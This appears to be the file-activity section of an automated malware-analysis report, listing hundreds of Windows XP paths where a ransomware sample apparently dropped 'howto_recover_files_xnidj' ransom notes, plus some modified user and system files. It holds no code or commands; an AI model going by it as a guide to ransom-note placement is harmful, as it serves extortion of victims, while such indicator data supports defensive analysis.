    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\howto_recover_files_xnidj.html (6 bytes)
    C:\totalcmd\LANGUAGE\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\REGISTER.RTF (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Games\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    C:\System Volume Information\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Desktop\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\HISTORY.TXT (3890 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\KTOR0Z81\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (1181 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Recent\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (1084 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\powerpnt.ppt (454 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\DEFAULT.BAR (2816 bytes)
    %Documents and Settings%\Default User\Cookies\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
    %System%\config\software (2560 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (1216 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
    C:\System Volume Information\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Recent\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\DRM\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\KTOR0Z81\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\excel.xls (427 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (1052 bytes)
    %Documents and Settings%\%current user%\Templates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt (1116 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma (6148 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Games\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\4XCFALMJ\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma (7698 bytes)
    %Documents and Settings%\%current user%\Cookies\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Favorites\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\My Music\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (1216 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Wireshark\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\VMware\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (11392 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\brndlog.txt (436 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\winword2.doc (419 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (1020 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (1440 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    C:\totalcmd\LANGUAGE\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (1020 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Desktop\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (1157 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Templates\excel.xls (427 bytes)
    %Documents and Settings%\Default User\My Documents\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\howto_recover_files_xnidj.txt (2 bytes)
